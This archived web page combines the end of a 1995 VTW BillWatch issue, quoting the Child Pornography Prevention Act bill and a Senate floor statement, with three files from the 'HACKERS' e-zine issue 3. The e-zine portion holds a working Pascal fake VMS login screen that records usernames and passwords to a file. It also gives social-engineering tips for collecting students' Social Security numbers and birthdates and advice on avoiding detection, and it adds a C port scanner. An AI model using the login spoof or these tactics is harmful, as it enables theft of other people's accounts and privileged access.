(5) the elimination of child pornography and the protection
of children from sexual exploitation provide a compelling
governmental interest for prohibiting the production,
distribution, possession, or viewing of child pornography.
SEC. 3. DEFINITIONS.
Section 2256 of title 18, United States Code, is amended--
(1) in paragraph (2)(E), by inserting before the semicolon
the following: `, or the buttocks of any minor, or the breast
of any female minor';
(2) in paragraph (5), by inserting before the semicolon the
following: `, and data stored on computer disk or by electronic
means which is capable of conversion into a visual image';
(3) in paragraph (6), by striking `and';
(4) in paragraph (7), by striking the period and inserting `;
and'; and
(5) by adding at the end the following new paragraph:
`(8) `child pornography' means any visual depiction,
including any photograph, film, video, picture, drawing, or
computer or computer-generated image or picture, whether made
or produced by electronic, mechanical, or other means, of
sexually explicit conduct, where--
`(A) the production of such visual depiction involves the
use of a minor engaging in sexually explicit conduct;
`(B) such visual depiction is, or appears to be, of a
minor engaging in sexually explicit conduct; or
`(C) such visual depiction is advertised, promoted,
presented, described, or distributed in such a manner that
conveys the impression that the material is or contains a
visual depiction of a minor engaging in sexually explicit
conduct.'.
SEC. 4. PROHIBITED ACTIVITIES RELATING TO MATERIAL CONSTITUTING OR
CONTAINING CHILD PORNOGRAPHY.
(a) In General: Section 2252 of title 18, United States Code, is
amended to read as follows:
`Sec. 2252. Certain activities relating to material constituting or
containing child pornography
`(a) Any person who--
`(1) knowingly mails, transports, or ships in interstate or
foreign commerce by any means, including by computer, any child
pornography;
`(2) knowingly receives or distributes--
`(A) any child pornography that has been mailed, shipped,
or transported in interstate or foreign commerce by any
means, including by computer; or
`(B) any material that contains child pornography that
has been mailed, shipped, or transported in interstate or
foreign commerce by any means, including by computer;
`(3) knowingly reproduces any child pornography for
distribution through the mails, or in interstate or foreign
commerce by any means, including by computer;
`(4) either--
`(A) in the maritime and territorial jurisdiction of the
United States, or on any land or building owned by, leased
to, or otherwise used by or under the control of the United
States Government, or in the Indian country (as defined in
section 1151), knowingly sells or possesses with the intent
to sell any child pornography; or
`(B) knowingly sells or possesses with the intent to sell
any child pornography that has been mailed, shipped, or
transported in interstate or foreign commerce by any means,
including by computer, or that was produced using materials
that have been mailed, shipped, or transported in
interstate or foreign commerce by any means, including by
computer; or
`(5) either--
`(A) in the maritime and territorial jurisdiction of the
United States, or on any land or building owned by, leased
to, or otherwise used by or under the control of the United
States Government, or in the Indian country (as defined in
section 1151), knowingly possesses 3 or more books,
magazines, periodicals, films, videotapes, computer disks,
or any other material that contains any child pornography; or
`(B) knowingly possesses 3 or more books, magazines,
periodicals, films, videotapes, computer disks, or any
other material that contains any child pornography that has
been mailed, shipped, or transported in interstate or
foreign commerce by any means, including by computer,
shall be punished as provided in subsection (b).
`(b)(1) Whoever violates, or attempts or conspires to violate,
paragraphs (1), (2), (3), or (4) of subsection (a) shall be fined
under this title or imprisoned not more than 10 years, or both,
but, if such person has a prior conviction under this chapter or
chapter 109A, such person shall be fined under this title and
imprisoned for not less than 5 years nor more than 15 years.
`(2) Whoever violates paragraph (5) of subsection (a) shall be
fined under this title or imprisoned for not more than 5 years, or
both.'.
(b) Technical Amendment: The table of sections for chapter 110 of
title 18, United States Code, is amended by amending the item
relating to section 2252 to read as follows:
`2252. Certain activities relating to material constituting or
containing child pornography.'.
SEC. 5. PRIVACY PROTECTION ACT AMENDMENTS.
Section 101 of the Privacy Protection Act of 1980 (42 U.S.C.
2000aa) is amended--
(1) in subsection (a)(1), by inserting before the semicolon
at the end the following: `, or if the offense involves the
production, possession, receipt, mailing, sale, distribution,
shipment, or transportation of child pornography, the sexual
exploitation of children, or the sale or purchase of children
under section 2251, 2251A, or 2252 of title 18, United States
Code'; and
(2) in subsection (b)(1), by inserting before the semicolon
at the end the following: `, or if the offense involves the
production, possession, receipt, mailing, sale, distribution,
shipment, or transportation of child pornography, the sexual
exploitation of children, or the sale or purchase of children
under section 2251, 2251A, or 2252 of title 18, United States
Code'.
SEC. 6. SEVERABILITY.
If any provision of this Act, an amendment made by this Act, or
the application of such provision or amendment to any person or
circumstance is held to be unconstitutional, the remainder of this
Act, the amendments made by this Act, and the application of such
to any other person or circumstance shall not be affected thereby.


STATEMENTS OF INTRODUCED BILLS AND JOINT RESOLUTIONS (Senate -
September 13, 1995)



THE CHILD PORNOGRAPHY PREVENTION ACT OF 1995



Mr. HATCH. Mr. President, it is impossible for any decent American not
to be outraged by child pornography and the sexual exploitation of
children. Such material is a plague upon our people and the moral
fabric of this great Nation.

And, as a great Nation, I believe that we have both the constitutional
right and moral obligation to protect our children from those who,
motivated by profit or perversion or both, would abuse, exploit, and
degrade the weakest and most vulnerable members of our society.

Current Federal law dealing with child pornography reflects the
overwhelming bipartisan consensus which has always existed, both in
Congress and in the country, that there is no place for such filth
even in a free society and that those who produce or peddle this
reprehensible material must be made to feel the full weight of the law
and suffer a punishment reflective of the seriousness of their
offense.

As with many of our criminal statutes, however, effective enforcement
of our laws against child pornography today faces a new obstacle: The
criminal use, or misuse, of new technology which is outside the scope
of existing statutes. In order to close this computer-generated
loophole and to give our law enforcement authorities the tools they
need to stem the increasing flow of high-tech child pornography, I am
today introducing the Child Pornography Prevention Act of 1995.

The necessity for prompt legislative action amending our existing
Federal child pornography statutes to cover the use of computer
technology in the production of such material was vividly illustrated
by a recent story in the Washington Times. This story, dated July 23,
1995, reported the conviction in Canada of a child pornographer who
copied innocuous pictures of children from books and catalogs onto a
computer, altered the images to remove the childrens' clothing, and
then arranged the children into sexual positions. According to
Canadian police, these sexual scenes involved not only adults and
children, but also animals.

Even more shocking than the occurrence of this type of repulsive
conduct is the fact that, under current Federal law, those pictures,
depicting naked children involved in sex with other children, adults,
and even animals, would not be prosecutable as child pornography. That
is because current Federal child pornography and sexual exploitation
of children laws, United States Code title 18, sections 2251, 2251A,
and 2252, cover only visual depictions of children engaging in
sexually explicit conduct whose production involved the use of a minor
engaging in such conduct; materials such as photographs, films, and
videotapes.

Today, however, visual depictions of children engaging in any
imaginable forms of sexual conduct can be produced entirely by
computer, without using children, thereby placing such depictions
outside the scope of Federal law. Computers can also be used to alter
sexually explicit photographs, films, and videos in such a way as to
make it virtually impossible for prosecutors to identify individuals,
or to prove that the offending material was produced using children.

The problem is simple: While Federal law has failed to keep pace with
technology, the purveyors of child pornography have been right on line
with it. This bill will help to correct that problem.

The Child Pornography Prevention Act of 1995, which includes a
statement of congressional findings as to harm, both to children and
adults, resulting from child pornography, has three major provisions.
First, it would amend United States Code title 18, section 2256, to
establish, for the first time, a specific, comprehensive, Federal
statutory definition of child pornography. Under this bill, any visual
depiction, such as a photograph, film, videotape or computer image,
which is produced by any means, including electronically by computer,
of sexually explicit conduct will be classified as child pornography
if: (a) its production involved the use of a minor engaging in
sexually explicit conduct; or (b) it depicts, or appears to depict, a
minor engaging in sexually explicit conduct; or (c) it is promoted or
advertised as depicting a minor engaging in sexually explicit conduct.

_________________________________________________________________ __________

SUBSCRIPTION AND REPRODUCTION INFORMATION

*** Know of someone ANYWHERE with a fax machine but without net ***
*** access that's interested in VTW's issues? Tell them to ***
*** call and get on our weekly fax distribution list at ***
*** (718) 596-2851 (or email us their fax number). ***

To get on the distribution list for BillWatch, send mail to
listproc@vtw.org with "subscribe vtw-announce Firstname Lastname"
in the subject line.

To unsubscribe from BillWatch (and all other VTW publications)
send mail to listproc@vtw.org with "unsubscribe vtw-announce"
in the subject line.

Email vtw@vtw.org with "send billwatch" in the SUBJECT LINE
to receive the latest version of BillWatch

For permission to reproduce VTW alerts contact vtw@vtw.org


_________________________________________________________________ __________
End VTW BillWatch Issue #18, Date: Sun Sep 17 16:36:37 EDT 1995
_________________________________________________________________ __________
This file provided by:

Voters Telecommunications Watch
*** Watching out for your civil liberties ***

Email: vtw@vtw.org (preferred)
Gopher: gopher -p1/vtw gopher.panix.com
URL: http://www.vtw.org/
Telephone: (718) 596-2851 (last resort)
================================================================= ==========

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #7 of 9

A VMS Login Spoof

By: Talonphish


----------------------------------------------------------------- ------------
When I read last months issue of HACKERS, I was excited to see
the article about VAX hacking. One thing I noticed was that to use most,
if not all of the things spoken about in the article, you had to already
have a privileged account. This left open one question, Just how does
one go about getting a privileged account on a VAX system? That is where
this article picks up.
It has been said that to completly secure a system you would need
to shut it down and lock it up. In other words, not let anyone use it or
even get near it. It has also been said that the weakest link in a
secure system is the system users. This even holds true for VAX, which
is almost considered a swear word by many because it is supposedly
"unhackable". Not the case.

GETTING AN ACCOUNT.
-------------------------
The first thing a person needs to do in order to do anything with
a VAX is obviously to get an account. It doesn't have to be a privileged
account, any account will do.
The best way to do this would be to perform a little Social
Engineering. Shoulder surfing should do the trick. If that is
impossible, then just do something similar to what I did.
At a certain college running VAX, all freshman students passwords
were their birthdate in the form 041975, until they changed them. All
usernames for students were their first initial, last 6 digits of their
social security number, and their last initial. Most freshman students
are somewhat computer illiterate, and never change their passwords.
Therefore, all you needed to do to get an account, was to look at their
drivers licence, or conduct a little survey (not in the computer lab)
asking students questions about major etc.. and just dropping in a
question of their soc. number and birthday.. The moral? Often a person
doesnt need to look to holes, or other stupid bugs posted on the net
that anyone can abuse, but to yourself and your own imagination to gain
needed information.

ONCE YOU HAVE AN ACCOUNT.
----------------------------

Once you have an account, be it yours or someone elses, you want
to gain priviliges or at least an account that isn't yours to use.
Assuming that your account is just a basic user account with no special
priv's, you need to devise a plan to get a different account. Now you
need to do a little research. Where do people with priviliged accounts
log in from? ie.. Professors. Once you know this, you can steal their
accounts fairly easily with a little program. All you need to know is
what the login screens look like. Here is a VERY simple pascal program
that will write the username and password to a file called outfile.
!!!WARNING!!! This is not an amazing program, if you are
going to use it, don't use it from your account! You should also add
lines to the file login.com that will log out the account should anyone
break out of the program and type things such as directory, show users,
or anything else normally typed. You don't want people to know which
account you are on. I also changed the prompt so it said "ERROR, TURN
OFF TERMINAL AND REEBOOT"
You can do this by typing Set prompt:== "whatever"
from the $ prompt.

begin program
----------------------------------------------------------------- -----------
program snag(input,output,outfile);
type
str20= varying[20] of char;
var
outfile:file;
I:integer;
cvax,username,password:str20;
begin
rewrite outfile;
write('Local> ');
readln(cvax); {this simulates the login screen}
writeln('Local -010- session 1 to VAX on node OMEGA established');
writeln('Somewhere University of XX');
writeln('Computing and Communications Center');
writeln('Unauthorized Access Prohibited'); {ain't it the truth}
write('Username: ');
readln(username);
write('Password: ');
readln(password);
write(outfile,username);
write(outfile,password);
writeln('ERROR x99503b, Please turn off terminal and reeboot');
close outfile;
for I=1 to 100 do
readln; {prevents person from hitting keys and going
back to shell}
end.
--------------------------------------------------------------
end program..

Run in the right place at the right time and viola, priviliged
access. Then use the things you learned in issue #2 of HACKERS and
hack away.
*note* This program did not turn off echo from keyboard to
screen for the input of password, this could be a dead giveaway. I
suggest rewriting the code(in a better language). This is only an
example.
In closing,
No system will ever be secure and useful at the same
time.


Talonphish




* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #8 of 9

Remote Host Probing

By: IOERROR

The enclosed program, 100% my own code, will probe port 1-1024 on the given
host (call it as: % tcpprobe connected.com) and report on which hosts accept
connections. It may require a little tweaking to work on some of the oddball
Unixes like SunOS... I wrote it under Linux.
-----BEGIN-----cut here-----
/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv)
{
int probeport = 0;
struct hostent *host;
int err, i, net;
struct sockaddr_in sa;

if (argc != 2) {
printf("Usage: %s hostname\n", argv[0]);
exit(1);
}

for (i = 1; i < 1024; i++) {
strncpy((char *)&sa, "", sizeof sa);
sa.sin_family = AF_INET;
if (isdigit(*argv[1]))
sa.sin_addr.s_addr = inet_addr(argv[1]);
else if ((host = gethostbyname(argv[1])) != 0)
strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
else {
herror(argv[1]);
exit(2);
}
sa.sin_port = htons(i);
net = socket(AF_INET, SOCK_STREAM, 0);
if (net < 0) {
perror("\nsocket");
exit(2);
}
err = connect(net, (struct sockaddr *) &sa, sizeof sa);
if (err < 0) {
printf("%s %-5d %s\r", argv[1], i, strerror(errno));
fflush(stdout);
} else {
printf("%s %-5d accepted. \n", argv[1], i);
if (shutdown(net, 2) < 0) {
perror("\nshutdown");
exit(2);
}
}
close(net);
}
printf(" \r");
fflush(stdout);
return (0);
}

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #3, File #9 of 9

The End


As I said in the intro, I've moved, so from now on direct all snail
mail to Room #621A, Redwood Hall, 186 Bleeker St., Newark, NJ 07103. My
new phone number is (201) 565-9145, and if you live in NYC, I'll see you at
2600, hopefully. As always, if you've got an article or two, send them over
to scanlonr@delphi.com. We still have not had enough reader response, good
or bad, to justify a letters column, so if you have anything to say about the
mag, or have any questions about Hacking as a whole, send them on in. So
until next month, where ever you hack, may the ethic be with you....

* * * * * * * * * * * * * * * * * * * *


← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT